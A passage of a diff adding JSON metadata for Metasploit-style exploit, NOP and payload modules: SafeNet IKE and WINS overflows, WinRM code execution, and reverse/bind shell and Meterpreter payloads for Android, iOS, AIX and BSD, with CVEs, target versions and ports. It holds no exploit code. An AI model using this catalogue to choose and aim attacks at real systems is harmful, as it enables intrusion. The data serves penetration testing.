+ "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/vpn/safenet_ike_11": { + "name": "SafeNet SoftRemote IKE Service Buffer Overflow", + "fullname": "exploit/windows/vpn/safenet_ike_11", + "aliases": [], + "rank": 200, + "disclosure_date": "2009-06-01", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Safenet SoftRemote IKE IreIKE.exe\n service. When sending a specially crafted udp packet to port 62514 an\n attacker may be able to execute arbitrary code. This module has\n been tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using\n windows/meterpreter/reverse_ord_tcp payloads.", + "references": [ + "CVE-2009-1943", + "OSVDB-54831", + "BID-35154", + "URL-http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1" + ], + "platform": "Windows", + "arch": "", + "rport": 62514, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "SafeNet Irelke 10.8.0.20", + "SafeNet Irelke 10.8.0.10", + "SafeNet Irelke 10.8.3.6" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/vpn/safenet_ike_11.rb", + "is_install_path": true, + "ref_name": "windows/vpn/safenet_ike_11", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/winrm/winrm_script_exec": { + "name": "WinRM Script Exec Remote Code Execution", + "fullname": "exploit/windows/winrm/winrm_script_exec", + "aliases": [], + "rank": 0, + "disclosure_date": "2012-11-01", + "type": "exploit", + "author": [ + "thelightcosine" + ], + "description": "This module uses valid credentials to login to the WinRM service\n and execute a payload. It has two available methods for payload\n delivery: Powershell 2 (and above) and VBS CmdStager.\n\n The module will check if Powershell is available, and if so uses\n that method. Otherwise it falls back to the VBS CmdStager which is\n less stealthy.", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 5985, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 5985, + 5986 + ], + "autofilter_services": [ + "http", + "https", + "winrm" + ], + "targets": [ + "Windows" + ], + "mod_time": "2023-01-03 11:26:07 +0000", + "path": "/modules/exploits/windows/winrm/winrm_script_exec.rb", + "is_install_path": true, + "ref_name": "windows/winrm/winrm_script_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/wins/ms04_045_wins": { + "name": "MS04-045 Microsoft WINS Service Memory Overwrite", + "fullname": "exploit/windows/wins/ms04_045_wins", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-12-14", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits an arbitrary memory write flaw in the\n WINS service. This exploit has been tested against Windows\n 2000 only.", + "references": [ + "CVE-2004-1080", + "OSVDB-12378", + "BID-11763", + "MSB-MS04-045" + ], + "platform": "Windows", + "arch": "", + "rport": 42, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/wins/ms04_045_wins.rb", + "is_install_path": true, + "ref_name": "windows/wins/ms04_045_wins", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "nop_aarch64/simple": { + "name": "Simple", + "fullname": "nop/aarch64/simple", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "timwr" + ], + "description": "Simple NOP generator", + "references": [], + "platform": "All", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/aarch64/simple.rb", + "is_install_path": true, + "ref_name": "aarch64/simple", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_armle/simple": { + "name": "Simple", + "fullname": "nop/armle/simple", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "hdm " + ], + "description": "Simple NOP generator", + "references": [], + "platform": "All", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/armle/simple.rb", + "is_install_path": true, + "ref_name": "armle/simple", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_cmd/generic": { + "name": "Generic Command Nop Generator", + "fullname": "nop/cmd/generic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "hdm ", + "bcoles " + ], + "description": "Generates harmless padding for command payloads.", + "references": [], + "platform": "All", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-01-28 15:29:56 +0000", + "path": "/modules/nops/cmd/generic.rb", + "is_install_path": true, + "ref_name": "cmd/generic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_mipsbe/better": { + "name": "Better", + "fullname": "nop/mipsbe/better", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "jm" + ], + "description": "Better NOP generator", + "references": [], + "platform": "All", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/mipsbe/better.rb", + "is_install_path": true, + "ref_name": "mipsbe/better", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_php/generic": { + "name": "PHP Nop Generator", + "fullname": "nop/php/generic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "hdm " + ], + "description": "Generates harmless padding for PHP scripts", + "references": [], + "platform": "All", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/php/generic.rb", + "is_install_path": true, + "ref_name": "php/generic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_ppc/simple": { + "name": "Simple", + "fullname": "nop/ppc/simple", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "hdm " + ], + "description": "Simple NOP generator", + "references": [], + "platform": "All", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/ppc/simple.rb", + "is_install_path": true, + "ref_name": "ppc/simple", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_riscv32le/simple": { + "name": "Simple", + "fullname": "nop/riscv32le/simple", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "bcoles " + ], + "description": "Simple NOP generator", + "references": [], + "platform": "All", + "arch": "riscv32le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-01 02:46:28 +0000", + "path": "/modules/nops/riscv32le/simple.rb", + "is_install_path": true, + "ref_name": "riscv32le/simple", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_riscv64le/simple": { + "name": "Simple", + "fullname": "nop/riscv64le/simple", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "bcoles " + ], + "description": "Simple NOP generator", + "references": [], + "platform": "All", + "arch": "riscv64le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-01 02:46:28 +0000", + "path": "/modules/nops/riscv64le/simple.rb", + "is_install_path": true, + "ref_name": "riscv64le/simple", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_sparc/random": { + "name": "SPARC NOP Generator", + "fullname": "nop/sparc/random", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "vlad902 " + ], + "description": "SPARC NOP generator", + "references": [], + "platform": "All", + "arch": "sparc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/sparc/random.rb", + "is_install_path": true, + "ref_name": "sparc/random", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_tty/generic": { + "name": "TTY Nop Generator", + "fullname": "nop/tty/generic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "hdm " + ], + "description": "Generates harmless padding for TTY input", + "references": [], + "platform": "All", + "arch": "tty", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/tty/generic.rb", + "is_install_path": true, + "ref_name": "tty/generic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_x64/simple": { + "name": "Simple", + "fullname": "nop/x64/simple", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "sf " + ], + "description": "An x64 single/multi byte NOP instruction generator.", + "references": [], + "platform": "All", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/x64/simple.rb", + "is_install_path": true, + "ref_name": "x64/simple", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_x86/opty2": { + "name": "Opty2", + "fullname": "nop/x86/opty2", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "spoonm ", + "optyx " + ], + "description": "Opty2 multi-byte NOP generator", + "references": [], + "platform": "All", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/x86/opty2.rb", + "is_install_path": true, + "ref_name": "x86/opty2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_x86/single_byte": { + "name": "Single Byte", + "fullname": "nop/x86/single_byte", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "spoonm " + ], + "description": "Single-byte NOP generator", + "references": [], + "platform": "All", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/x86/single_byte.rb", + "is_install_path": true, + "ref_name": "x86/single_byte", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "payload_aix/ppc/shell_bind_tcp": { + "name": "AIX Command Shell, Bind TCP Inline", + "fullname": "payload/aix/ppc/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "AIX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "aix/ppc/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_aix/ppc/shell_find_port": { + "name": "AIX Command Shell, Find Port Inline", + "fullname": "payload/aix/ppc/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "AIX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/aix/ppc/shell_find_port.rb", + "is_install_path": true, + "ref_name": "aix/ppc/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_aix/ppc/shell_interact": { + "name": "AIX execve Shell for inetd", + "fullname": "payload/aix/ppc/shell_interact", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jduck " + ], + "description": "Simply execve /bin/sh (for inetd programs)", + "references": [], + "platform": "AIX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/aix/ppc/shell_interact.rb", + "is_install_path": true, + "ref_name": "aix/ppc/shell_interact", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_aix/ppc/shell_reverse_tcp": { + "name": "AIX Command Shell, Reverse TCP Inline", + "fullname": "payload/aix/ppc/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "AIX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "aix/ppc/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_android/meterpreter/reverse_http": { + "name": "Android Meterpreter, Android Reverse HTTP Stager", + "fullname": "payload/android/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves", + "anwarelmakrahy" + ], + "description": "Run a meterpreter server in Android.\n\nTunnel communication over HTTP", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/android/reverse_http.rb", + "is_install_path": true, + "ref_name": "android/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "android/meterpreter", + "stager_refname": "android/reverse_http" + }, + "payload_android/meterpreter/reverse_https": { + "name": "Android Meterpreter, Android Reverse HTTPS Stager", + "fullname": "payload/android/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves", + "anwarelmakrahy" + ], + "description": "Run a meterpreter server in Android.\n\nTunnel communication over HTTPS", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/android/reverse_https.rb", + "is_install_path": true, + "ref_name": "android/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "android/meterpreter", + "stager_refname": "android/reverse_https" + }, + "payload_android/meterpreter/reverse_tcp": { + "name": "Android Meterpreter, Android Reverse TCP Stager", + "fullname": "payload/android/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves" + ], + "description": "Run a meterpreter server in Android.\n\nConnect back stager", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/android/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "android/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "android/meterpreter", + "stager_refname": "android/reverse_tcp" + }, + "payload_android/meterpreter_reverse_http": { + "name": "Android Meterpreter Shell, Reverse HTTP Inline", + "fullname": "payload/android/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [], + "description": "Connect back to attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/android/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "android/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_android/meterpreter_reverse_https": { + "name": "Android Meterpreter Shell, Reverse HTTPS Inline", + "fullname": "payload/android/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [], + "description": "Connect back to attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/android/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "android/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_android/meterpreter_reverse_tcp": { + "name": "Android Meterpreter Shell, Reverse TCP Inline", + "fullname": "payload/android/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [], + "description": "Connect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/android/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "android/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_android/shell/reverse_http": { + "name": "Command Shell, Android Reverse HTTP Stager", + "fullname": "payload/android/shell/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "anwarelmakrahy", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (sh).\n\nTunnel communication over HTTP", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/android/reverse_http.rb", + "is_install_path": true, + "ref_name": "android/shell/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "android/shell", + "stager_refname": "android/reverse_http" + }, + "payload_android/shell/reverse_https": { + "name": "Command Shell, Android Reverse HTTPS Stager", + "fullname": "payload/android/shell/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "anwarelmakrahy", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (sh).\n\nTunnel communication over HTTPS", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/android/reverse_https.rb", + "is_install_path": true, + "ref_name": "android/shell/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "android/shell", + "stager_refname": "android/reverse_https" + }, + "payload_android/shell/reverse_tcp": { + "name": "Command Shell, Android Reverse TCP Stager", + "fullname": "payload/android/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt " + ], + "description": "Spawn a piped command shell (sh).\n\nConnect back stager", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/android/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "android/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "android/shell", + "stager_refname": "android/reverse_tcp" + }, + "payload_apple_ios/aarch64/meterpreter_reverse_http": { + "name": "Apple_iOS Meterpreter, Reverse HTTP Inline", + "fullname": "payload/apple_ios/aarch64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Apple_iOS", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "apple_ios/aarch64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_apple_ios/aarch64/meterpreter_reverse_https": { + "name": "Apple_iOS Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/apple_ios/aarch64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Apple_iOS", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "apple_ios/aarch64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_apple_ios/aarch64/meterpreter_reverse_tcp": { + "name": "Apple_iOS Meterpreter, Reverse TCP Inline", + "fullname": "payload/apple_ios/aarch64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Apple_iOS", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_apple_ios/aarch64/shell_reverse_tcp": { + "name": "Apple iOS aarch64 Command Shell, Reverse TCP Inline", + "fullname": "payload/apple_ios/aarch64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Apple_iOS", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "apple_ios/aarch64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_apple_ios/armle/meterpreter_reverse_http": { + "name": "Apple_iOS Meterpreter, Reverse HTTP Inline", + "fullname": "payload/apple_ios/armle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Apple_iOS", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "apple_ios/armle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_apple_ios/armle/meterpreter_reverse_https": { + "name": "Apple_iOS Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/apple_ios/armle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Apple_iOS", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "apple_ios/armle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_apple_ios/armle/meterpreter_reverse_tcp": { + "name": "Apple_iOS Meterpreter, Reverse TCP Inline", + "fullname": "payload/apple_ios/armle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Apple_iOS", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "apple_ios/armle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/sparc/shell_bind_tcp": { + "name": "BSD Command Shell, Bind TCP Inline", + "fullname": "payload/bsd/sparc/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "BSD", + "arch": "sparc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/sparc/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/sparc/shell_reverse_tcp": { + "name": "BSD Command Shell, Reverse TCP Inline", + "fullname": "payload/bsd/sparc/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "BSD", + "arch": "sparc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/sparc/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/vax/shell_reverse_tcp": { + "name": "BSD Command Shell, Reverse TCP Inline", + "fullname": "payload/bsd/vax/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "wvu " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "BSD", + "arch": "vax", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/vax/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, 